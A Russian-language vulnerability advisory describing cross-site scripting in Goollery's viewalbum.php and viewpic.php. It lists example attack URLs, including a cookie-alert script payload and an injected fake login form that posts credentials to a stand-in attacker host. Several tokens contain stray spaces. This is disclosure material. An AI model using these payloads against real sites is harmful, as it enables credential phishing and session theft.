Межсайтовое выполнение сценариев в Goollery

Описание:
Обнаружено межсайтовое выполнение сценариев в Goollery. Удаленный атакующий может получить доступ к важной информации пользователей.

Уязвимость существует из-за некорректной фильтрации входных данных в сценариях 'viewalbum.php' and 'viewpic.php'. Удаленный атакующий может создать специально сформированный URL, который выполнит произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a
& page=[XSS -CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a
& page=<body>XSS%20poW@!!<script>alert(document.coo kie)</script></body>
& sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a
& page=<form%20action="http://www.a tacker.com/save2db.asp"%20method="post">
Username:<input%20name="username"%20type="text"%20maxlength="30"><br>
Password:<input%20name="password"%20type="text"%20maxleng th="30"><br>
< input%20name="login"%20type="submit"%20value="Login"></form>
& sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation _id=ffee00b71f3931a
& page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a
& btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">
Username:<input%20name="username"%20type="text"%20maxlength="30"><br>
Password:<input%20nam e="password"%20type="text"%20maxlength="30"><br>
< input%20name="login"%20type="submit"%20value="Login"></form>

http://[TARGET]/goollery/viewalbum.php?conversation_id= ffee00b71f3931a
& page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1162f15c4eb4b7e89da17

URL производителя: www.wirzm.ch/goollery/about/about.php

Решение: Решение не существует на данный момент.